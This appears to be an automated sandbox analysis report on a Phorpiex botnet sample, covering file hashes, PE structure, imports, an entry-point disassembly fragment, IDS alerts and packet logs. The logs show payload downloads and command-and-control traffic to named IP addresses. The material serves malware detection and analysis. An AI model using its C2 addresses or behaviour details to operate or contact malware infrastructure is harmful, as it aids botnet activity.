                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\71384504.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):85504
                                                                                                                                                    Entropy (8bit):6.394560338648692
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                    MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                    SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                    SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                    SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Entropy (8bit):7.4258534569714465
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:thcdVit1dX.exe
                                                                                                                                                    File size:1'390'680 bytes
                                                                                                                                                    MD5:cbd0e8f0c0aefe122d41029c119624cf
                                                                                                                                                    SHA1:8bfafcfb05c61d27d6bf114128a891d0799dd2bd
                                                                                                                                                    SHA256:6b9670cd01edbc5d5f1aa015fd976155660f8a7227f2c1a8d5dc6eaa7fe9a772
                                                                                                                                                    SHA512:8e9a5e54bb6d69c126508eb6a28ea9b6623e4e5a135360f5422498cdd31552e3105435a50de2b17fa4432f871021c40a6426c550e6ff51c86729c9344584ff2e
                                                                                                                                                    SSDEEP:24576:ifZIGdCrb22qa1kheV1xUDPKPiuls4keJKaDxrdIG4BBs94bVva6jL3e67:0tdCvqa7VHsjeKzG4BM4Nl/
                                                                                                                                                    TLSH:4A55AF316165242BDAF40D73F920D2307E2897282B4C86B6C6D0D91CB9685F67FFB25B
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........J........................Q....8.......8.......8......h........................................8.......83.......[......8.....

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:0b3359d979333d17

                                                                                                                                                    Static PE Info

                                                                                                                                                    General

                                                                                                                                                    Entrypoint:0x4c9000
                                                                                                                                                    Entrypoint Section:.zero
                                                                                                                                                    Digitally signed:true
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                                                                                                                    DLL Characteristics:NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                    Time Stamp:0xDEAD [Thu Jan 1 15:50:05 1970 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:6
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:6
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:7bfadc04305d1f82cd570b38018067b2

                                                                                                                                                    Authenticode Signature

                                                                                                                                                    Signature Valid:
                                                                                                                                                    Signature Issuer:
                                                                                                                                                    Signature Validation Error:
                                                                                                                                                    Error Number:
                                                                                                                                                    Not Before, Not After
                                                                                                                                                      Subject Chain
                                                                                                                                                        Version:
                                                                                                                                                        Thumbprint MD5:
                                                                                                                                                        Thumbprint SHA-1:
                                                                                                                                                        Thumbprint SHA-256:
                                                                                                                                                        Serial:

                                                                                                                                                        Entrypoint Preview

                                                                                                                                                        Instruction
                                                                                                                                                        push ebp
                                                                                                                                                        mov ebp, esp
                                                                                                                                                        sub esp, 00000978h
                                                                                                                                                        call 00007F898482A227h
                                                                                                                                                        mov dword ptr [ebp-0000023Ch], eax
                                                                                                                                                        cmp dword ptr [ebp-0000023Ch], 00000000h
                                                                                                                                                        jne 00007F8984829567h
                                                                                                                                                        jmp 00007F8984829CAEh
                                                                                                                                                        push 00000000h
                                                                                                                                                        push 00000001h
                                                                                                                                                        push 9B102E2Dh
                                                                                                                                                        mov eax, dword ptr [ebp-0000023Ch]
                                                                                                                                                        push eax
                                                                                                                                                        call 00007F8984829FAEh
                                                                                                                                                        add esp, 10h
                                                                                                                                                        mov dword ptr [ebp-0000073Ch], eax
                                                                                                                                                        cmp dword ptr [ebp-0000073Ch], 00000000h
                                                                                                                                                        jne 00007F8984829567h
                                                                                                                                                        jmp 00007F8984829C82h
                                                                                                                                                        mov ecx, dword ptr [ebp-0000073Ch]
                                                                                                                                                        push ecx
                                                                                                                                                        push 00000001h
                                                                                                                                                        push 526E0DCDh
                                                                                                                                                        mov edx, dword ptr [ebp-0000023Ch]
                                                                                                                                                        push edx
                                                                                                                                                        call 00007F8984829F7Dh
                                                                                                                                                        add esp, 10h
                                                                                                                                                        mov dword ptr [ebp-000006A8h], eax
                                                                                                                                                        cmp dword ptr [ebp-000006A8h], 00000000h
                                                                                                                                                        jne 00007F8984829567h
                                                                                                                                                        jmp 00007F8984829C51h
                                                                                                                                                        mov eax, dword ptr [ebp-0000073Ch]
                                                                                                                                                        push eax
                                                                                                                                                        push 00000001h
                                                                                                                                                        push C4B4A94Dh
                                                                                                                                                        mov ecx, dword ptr [ebp-0000023Ch]
                                                                                                                                                        push ecx
                                                                                                                                                        call 00007F8984829F4Ch
                                                                                                                                                        add esp, 10h
                                                                                                                                                        mov dword ptr [ebp-0000076Ch], eax
                                                                                                                                                        cmp dword ptr [ebp-0000076Ch], 00000000h
                                                                                                                                                        jne 00007F8984829567h
                                                                                                                                                        jmp 00007F8984829C20h
                                                                                                                                                        mov edx, 00000025h
                                                                                                                                                        mov word ptr [ebp-00000768h], dx
                                                                                                                                                        mov eax, 00000061h
                                                                                                                                                        mov word ptr [ebp-00000766h], ax

                                                                                                                                                        Data Directories

                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xaf4200xa0.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb50000xc47c.rsrc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x14f8c00x2f98
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xc20000x6630.reloc
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xae0dc0x54.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0xae1400x18.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa05280x40.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x770000x3f0.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xaee240x140.rdata
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                        Sections

                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                        .text0x10000x75f630x76000a1f881840c99f0a4f216f03d8dfec448False0.4892660884533898data6.479952028106227IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rdata0x770000x39aee0x39c002748b28fd40b68a9bf7113f8b5d73c62False0.24370941558441558data5.025845007148222IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .data0xb10000x180c0xa002808333f0787ad82f8c9dd8967360f58False0.191015625firmware 4ee6 v40bb (revision 0) \320nF V2, 0 bytes or less, at 0xb119bf44 0 bytes , at 0 0 bytes , at 0xffffffff 16777216 bytes2.3545373947133976IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .didat0xb30000xd40x200effae655fcae4daf3bc3f80a07a37362False0.265625PGP Secret Sub-key -1.8546470945125824IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                        .wixburn0xb40000x300x20020a58c151b9e1fb9cfe8116f62444024False0.107421875data0.5734966016060967IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .rsrc0xb50000xc47c0xc600a0256b519fc2a6ba3cf3e1fed05cf577False0.4613123421717172data6.265100639128537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                        .reloc0xc20000x66300x6800dfe4c001a82fea80bfc84b6e5185738bFalse0.7883112980769231data6.776140638251558IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                        .zero0xc90000xdb00x10002e89f54f1904c4f8301e18e29cf9499fFalse0.63525390625data6.347128369214904IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                                                                        Resources

                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                        RT_ICON0xb52800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/mEnglishUnited States0.5531914893617021
                                                                                                                                                        RT_ICON0xb56e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/mEnglishUnited States0.39385245901639343
                                                                                                                                                        RT_ICON0xb60700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/mEnglishUnited States0.3025328330206379
                                                                                                                                                        RT_ICON0xb71180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishUnited States0.19595435684647303
                                                                                                                                                        RT_ICON0xb96c00x33aaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9874489641615001
                                                                                                                                                        RT_RCDATA0xbca6c0x8dataEnglishUnited States1.75
                                                                                                                                                        RT_MESSAGETABLE0xbca740x3df8dataEnglishUnited States0.282274331820474
                                                                                                                                                        RT_GROUP_ICON0xc086c0x4cdataEnglishUnited States0.7763157894736842
                                                                                                                                                        RT_VERSION0xc08b80x390dataEnglishUnited States0.4298245614035088
                                                                                                                                                        RT_MANIFEST0xc0c480x832XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (2038), with CRLF line terminatorsEnglishUnited States0.30743565300285985

                                                                                                                                                        Imports

                                                                                                                                                        DLLImport
                                                                                                                                                        KERNEL32.dllInitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseMutex, CreateEventW, GetCurrentProcess, CreateThread, GetNativeSystemInfo, VerSetConditionMask, GetSystemTime, GetComputerNameW, VerifyVersionInfoW, GetDateFormatW, CompareStringW, GetUserDefaultUILanguage, GetUserDefaultLangID, GetSystemDefaultLangID, GetStringTypeW, CreateProcessW, DuplicateHandle, GetExitCodeProcess, CompareStringOrdinal, ProcessIdToSessionId, OpenProcess, GetProcessId, SetProcessShutdownParameters, CreateSemaphoreW, LocalFileTimeToFileTime, GetExitCodeThread, DosDateTimeToFileTime, CompareStringA, SetThreadExecutionState, ReleaseSemaphore, CreateMutexW, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, FreeLibrary, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, GetStdHandle, GetModuleHandleExW, GetFileType, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, DecodePointer, WriteConsoleW, VirtualQuery, VirtualProtect, GetSystemInfo, RaiseException, ExpandEnvironmentStringsW, GetProcessHeap, HeapSize, HeapFree, HeapReAlloc, HeapAlloc, GetModuleFileNameW, GetSystemWow64DirectoryW, GetSystemDirectoryW, GetLocalTime, SetLastError, GetTempPathW, GetVolumePathNameW, GetTempFileNameW, GetFullPathNameW, CopyFileW, GlobalFree, GlobalAlloc, Sleep, SetFileTime, SetFilePointerEx, SetEndOfFile, ReadFile, LoadLibraryExA, GetFileSizeEx, LCMapStringW, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, FormatMessageW, LocalFree, MoveFileExW, SetFileAttributesW, RemoveDirectoryW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CreateDirectoryW, GetCurrentDirectoryW, LoadLibraryExW, GetProcAddress, GetModuleHandleW, WaitForMultipleObjects, WaitForSingleObject, HeapSetInformation, GetLastError, lstrlenA, GetCurrentProcessId, GetModuleHandleA, MulDiv, GetSystemWindowsDirectoryW, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, LoadResource, LockResource, SizeofResource, FindResourceExA, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, SystemTimeToFileTime, GetTimeZoneInformation, WriteFile, SetFilePointer, CreateFileA, ExitProcess, CloseHandle, RtlUnwind, CreateFileW
                                                                                                                                                        USER32.dllGetDC, ReleaseDC, MonitorFromPoint, MonitorFromWindow, ShowWindow, IsDialogMessageW, LoadCursorW, GetMonitorInfoW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, SetWindowPos, CreateWindowExW, UnregisterClassW, RegisterClassW, PostQuitMessage, DefWindowProcW, DispatchMessageW, TranslateMessage, GetMessageW, WaitForInputIdle, IsWindow, PostMessageW, LoadBitmapW
                                                                                                                                                        GDI32.dllDeleteObject, SelectObject, StretchBlt, GetObjectW, DeleteDC, CreateDCW, CreateCompatibleDC, GetDeviceCaps
                                                                                                                                                        ADVAPI32.dllGetUserNameW, CryptAcquireContextW, CryptReleaseContext, QueryServiceConfigW, CryptGetHashParam, CryptCreateHash, CryptHashData, CryptDestroyHash, OpenProcessToken, AllocateAndInitializeSid, CheckTokenMembership, GetTokenInformation, AdjustTokenPrivileges, IsWellKnownSid, LookupPrivilegeValueW, RegCreateKeyExW, QueryServiceStatus, OpenServiceW, OpenSCManagerW, ControlService, CloseServiceHandle, ChangeServiceConfigW, SetEntriesInAclW, DecryptFileW, InitializeAcl, CreateWellKnownSid, ConvertStringSecurityDescriptorToSecurityDescriptorW, ReportEventW, OpenEventLogW, CloseEventLog, RegQueryInfoKeyW, RegDeleteValueW, RegQueryValueExW, InitiateSystemShutdownExW, RegOpenKeyExW, RegCloseKey, SetNamedSecurityInfoW, RegDeleteKeyW, RegEnumKeyExW, RegEnumValueW, RegSetValueExW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetEntriesInAclA
                                                                                                                                                        ole32.dllCoInitializeEx, CoInitialize, CoInitializeSecurity, CoUninitialize, CLSIDFromProgID, CoTaskMemFree, StringFromGUID2, CoCreateInstance
                                                                                                                                                        OLEAUT32.dllSysFreeString, VariantInit, SysAllocString, VariantClear
                                                                                                                                                        SHELL32.dllShellExecuteExW, CommandLineToArgvW, SHGetFolderPathW

                                                                                                                                                        Possible Origin

                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                        EnglishUnited States

                                                                                                                                                        Network Behavior

                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                        2024-10-26T07:26:10.813025+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21185.215.113.6680192.168.2.549720TCP
                                                                                                                                                        2024-10-26T07:26:10.813025+02002853272ETPRO MALWARE Win32/Phorpiex Bot Executable Payload Inbound1185.215.113.6680192.168.2.549720TCP
                                                                                                                                                        2024-10-26T07:26:10.813025+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.549771TCP
                                                                                                                                                        2024-10-26T07:26:17.704809+02002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549720185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:17.704902+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11185.215.113.6680192.168.2.549720TCP
                                                                                                                                                        2024-10-26T07:26:19.836764+02002856563ETPRO MALWARE Phorpiex Domain in DNS Lookup1192.168.2.5546771.1.1.153UDP
                                                                                                                                                        2024-10-26T07:26:20.780864+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549721185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:25.627582+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549721185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:25.627582+02002853292ETPRO MALWARE Win32/Phorpiex Twizt Variant CnC Checkin1192.168.2.549721185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:31.911590+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549771185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:31.911590+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.549771185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:33.655013+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.565053195.82.3.1540500UDP
                                                                                                                                                        2024-10-26T07:26:33.827471+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549784185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:33.827471+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.549784185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:34.137114+02002837677ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature)1185.215.113.6680192.168.2.549784TCP
                                                                                                                                                        2024-10-26T07:26:38.654038+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.5650532.184.189.18940500UDP
                                                                                                                                                        2024-10-26T07:26:39.456586+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549812185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:39.456586+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.549812185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:41.389569+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549823185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:41.389569+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.549823185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:43.670932+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.565053151.246.159.15740500UDP
                                                                                                                                                        2024-10-26T07:26:44.712858+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.54984191.202.233.14180TCP
                                                                                                                                                        2024-10-26T07:26:48.393009+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549864185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:48.393009+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.549864185.215.113.6680TCP
                                                                                                                                                        2024-10-26T07:26:48.687298+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.5650532.180.10.24740500UDP

                                                                                                                                                        Network Port Distribution

                                                                                                                                                        TCP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Oct 26, 2024 07:26:16.803350925 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:16.808856964 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:16.808943987 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:16.809123039 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:16.814465046 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.704734087 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.704797029 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.704808950 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.704834938 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.704845905 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.704866886 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.704879045 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.704901934 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.704911947 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.704936981 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.704945087 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.704971075 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.704976082 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.705004930 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.705023050 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.705034971 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.705050945 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.705070019 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.705077887 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.705122948 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.710383892 CEST8049720185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:17.710444927 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:17.827833891 CEST4972080192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:19.856327057 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:19.861618996 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:19.861695051 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:19.861862898 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:19.867099047 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780653954 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780675888 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780704975 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780724049 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780740976 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780756950 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780772924 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780790091 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780806065 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780823946 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.780864000 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.780921936 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.786729097 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.786747932 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.786906004 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.786906004 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.938314915 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938344955 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938385963 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938402891 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938420057 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938435078 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938451052 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938466072 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938474894 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938488960 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938503981 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938519955 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938535929 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938534975 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.938535929 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.938535929 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.938535929 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.938535929 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.938535929 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.938551903 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.938577890 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.938592911 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.938637972 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.939308882 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.939332962 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.939349890 CEST8049721185.215.113.66192.168.2.5
                                                                                                                                                        Oct 26, 2024 07:26:20.939362049 CEST4972180192.168.2.5185.215.113.66
                                                                                                                                                        Oct 26, 2024 07:26:20.939366102 CEST8049721185.215.113.66192.168.2.5
